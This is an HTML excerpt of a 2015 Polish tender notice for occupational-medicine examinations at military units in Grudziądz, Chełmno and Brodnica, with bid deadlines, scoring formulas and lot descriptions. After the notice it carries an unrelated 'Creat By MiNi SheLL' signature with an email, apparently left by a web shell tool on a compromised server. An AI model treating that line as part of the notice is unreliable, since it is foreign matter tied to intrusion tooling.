<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.13wog.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.11.2015 godzina 09:30, miejsce: kancelaria 13WOG ul.Czwartaków 3 86-300 Grudziądz (pom.7 bud. 1)-osobiście lub
przesyłka, wykonawca uwzględnia czas niezbędny na dostarczenie oferty bezpośrednio do kancelarii..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kopertę należy opisać hasłem: 
OFERTA PRZETARGOWA: USŁUGI WYKONYWANIA BADAŃ LEKARSKICH 
W ZAKRESIE MEDYCYNY PRACY DLA ŻOŁNIERZY I PRACOWNIKÓW JEDNOSTEK WOJSKOWYCH W MIEJSCOWOŚCIACH GRUDZIĄDZ, CHEŁMNO, BRODNICA
sprawa nr 126/2015 nie otwierać do dnia 19.11.2015 r. do godziny 10.00
Na kopercie umieścić należy w postaci pieczęci firmowej lub odręcznego napisu  nazwę Wykonawcy i jego adres zgodnie z danymi rejestrowymi (ewidencyjnymi).
Konsekwencje złożenia oferty niezgodnie z opisem (np. potraktowanie oferty jako zwykłej korespondencji 
i niedostarczenie jej na miejsce składania ofert w terminie jak w SIWZ) ponosi Wykonawca.
OPIS KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ PRZY WYBORZE OFERTY, WRAZ Z PODANIEM ZNACZENIA TYCH KRYTERIÓW I SPOSOBU OCENY OFERT (art. 36 ust. 1 pkt 13 Ustawy)

1.	Zamawiający dokona wyboru najkorzystniejszej oferty z ofert ważnych przy zastosowaniu kryterium:
1)	cena oferty  (Cn) - 90% 
C of.n.
Cn = ----------------------- x 90 pkt 
Cof.b.
gdzie: 
Cn    - liczba punktów za kryterium cena
Cof.n. - cena oferty najniższej w danym zadaniu
Cof.b. - cena oferty badanej w danym zadaniu

2)	dostępność lekarza medycyny pracy (Tn)- 10% 
za dostępność lekarza medycyny pracy nie rzadziej niż 1dzień w tygodniu -  Wykonawca nie otrzymuje punktów - czas wymagany w SIWZ. 
za dostępność lekarza medycyny pracy nie rzadziej niż 2 dni w tygodniu Wykonawca uzyska 
- 5 pkt. 
za dostępność lekarza medycyny pracy nie rzadziej niż 3 dni w tygodniu Wykonawca uzyska
 - 10 pkt.

2.	Wykonawca uzyska łącznie liczbę punktów (Pn - łączna liczba punktowa) za kryterium ceny 
i terminu przeprowadzenia konsultacji i badań specjalistycznych według wzoru:

Pn=Cn+Tn
3.	Wykonawca winien w treści formularza ofertowego wpisać deklarowaną dostępność lekarza medycyny pracy. W przypadku gdy Wykonawca nie wskaże przedmiotowej dostępności, Zamawiający uzna, iż Wykonawca oferuje dostępność minimalną tj. 1 dzień w tygodniu.
4.	Każda oferta będzie przeliczana w  stosunku  do  oferty z najwyższą liczbą punktów ogółem według wzoru w ust. 1 i 2.
5.	Oferta, która spełni wszystkie warunki i wymagania oraz uzyska najwyższą liczbę punktów, obliczoną wg ust. 1 pkt. 3, zostanie uznana za najkorzystniejszą.
6.	Jeżeli w niniejszym postępowaniu nie będzie można dokonać wyboru oferty najkorzystniejszej 
z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną (art. 91 ust. 4 Ustawy)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonywanie usługi badań lekarskich oraz konsultacji specjalistycznych w zakresie medycyny pracy dla żołnierzy i pracowników instytucji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonywanie usługi badań lekarskich oraz konsultacji specjalistycznych w zakresie medycyny pracy, dla żołnierzy i pracowników jednostek wojskowych w miejscowości Grudziądz zgodnie z wymaganiami określonymi poniżej przez Zamawiającego oraz szczegółowym wykazem usług ujętym w Formularzu ofertowym oraz warunkami świadczenia przedmiotu zamówienia wyszczególnionymi 
w Ogólnych Warunkach Umowy. Zadanie nr 1:  Wykonywanie usługi badań lekarskich oraz konsultacji specjalistycznych w zakresie medycyny pracy dla żołnierzy i pracowników instytucji:Jednostka Wojskowa 4503, ul. Czwartaków 3, 86-300 Grudziądz; Jednostka Wojskowa 1109, ul. Hallera 62, 86-300 Grudziądz; Centrum Szkolenia Logistyki, ul. Bema 2, 86-300 Grudziądz, Grupa, Węzeł Łączności, ul. Bema 1, 86-300 Grudziądz; Wojskowa Komenda Uzupełnień (WKU), ul. Legionów 48, 86-300 Grudziądz; Skład 1 Regionalnej Bazy Logistycznej  ul. Czwartaków 3, 86-300 Grudziądz; Skład 1 Regionalnej Bazy Logistycznej  Gardeja, 86-318 Rogóźno;
1 Rejonowe Warsztaty Techniczne ul. Czwartaków 3, 86-300 Grudziądz; Skład nr 1 i 2 Jednostki Wojskowej 1523  ul. Legionów 54 , 86-300 Grudziądz; Żandarmeria Wojskowa w Bydgoszczy Oddział w Grudziądzu, ul. Bema 11, 86-300 Grudziądz. 2. Świadczone usługi winny obejmować co najmniej zakres wskazany w Opisie przedmiotu zamówienia i formularzu ofertowym z uwzględnieniem obowiązku wykonywania usługi w pełnym zakresie badań medycyny pracy.
3. Wykonawca w zakresie zadania nr 1 zobowiązuje się do prowadzenia grup dyspanseryzacyjnych żołnierzy zawodowych, na zasadach określonych w Rozporządzeniu Ministra Obrony Narodowej z dnia 23 grudnia 2010 r. w sprawie niektórych świadczeń zdrowotnych przysługujących żołnierzom zawodowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Dostępność lekarza medycyny pracy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonywanie usługi badań lekarskich oraz konsultacji specjalistycznych w zakresie medycyny pracy wraz z dokonywaniem okresowych przeglądów stanowiskowych miejsc pracy (w przypadku zaistniałej konieczności).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie usługi badań lekarskich oraz konsultacji specjalistycznych w zakresie medycyny pracy, dla żołnierzy i pracowników jednostek wojskowych w miejscowości Chełmno zgodnie z wymaganiami określonymi poniżej przez Zamawiającego oraz szczegółowym wykazem usług ujętym w Formularzu ofertowym oraz warunkami świadczenia przedmiotu zamówienia wyszczególnionymi w Ogólnych Warunkach Umowy. Zadanie nr 2: Wykonywanie usługi badań lekarskich oraz konsultacji specjalistycznych w zakresie medycyny pracy wraz z dokonywaniem okresowych przeglądów stanowiskowych miejsc pracy (w przypadku zaistniałej konieczności):Jednostka Wojskowa 3136, ul. Aleje 3 Maja 4, 86-200 Chełmno; Węzeł Łączności, ul. Aleje 3 Maja 4, 86-200 Chełmno; Grupa Zabezpieczenia Chełmno, ul. Aleje 3 Maja 4, 86-200 Chełmno. 2. Świadczone usługi winny obejmować co najmniej zakres wskazany w Opisie przedmiotu zamówienia i formularzu ofertowym z uwzględnieniem obowiązku wykonywania usługi w pełnym zakresie badań medycyny pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Dostępność lekarza medycyny pracy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonywanie usługi badań lekarskich oraz konsultacji specjalistycznych w zakresie medycyny pracy dla żołnierzy i pracowników instytucji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie usługi badań lekarskich oraz konsultacji specjalistycznych w zakresie medycyny pracy, dla żołnierzy i pracowników jednostek wojskowych w miejscowości Brodnica zgodnie z wymaganiami określonymi poniżej przez Zamawiającego oraz szczegółowym wykazem usług ujętym w Formularzu ofertowym oraz warunkami świadczenia przedmiotu zamówienia wyszczególnionymi w Ogólnych Warunkach Umowy. Zadanie nr 3: Wykonywanie usługi badań lekarskich oraz konsultacji specjalistycznych 
w zakresie medycyny pracy dla żołnierzy i pracowników instytucji:	
Jednostka Wojskowa 3537, ul. Czwartaków 1, 87-300 Brodnica; 
Wojskowa Komenda Uzupełnień (WKU), ul. Królowej Jadwigi 4, 87-300 Brodnica;  
Węzeł Łączności, ul. Czwartaków 1 , 87-300 Brodnica;
Grupa Zabezpieczenia Brodnica, ul. Czwartaków 1, 87-300 Brodnica. 2.Świadczone usługi winny obejmować co najmniej zakres wskazany w Opisie przedmiotu zamówienia i formularzu ofertowym z uwzględnieniem obowiązku wykonywania usługi w pełnym zakresie badań medycyny pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Dostępność lekarza medycyny pracy - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com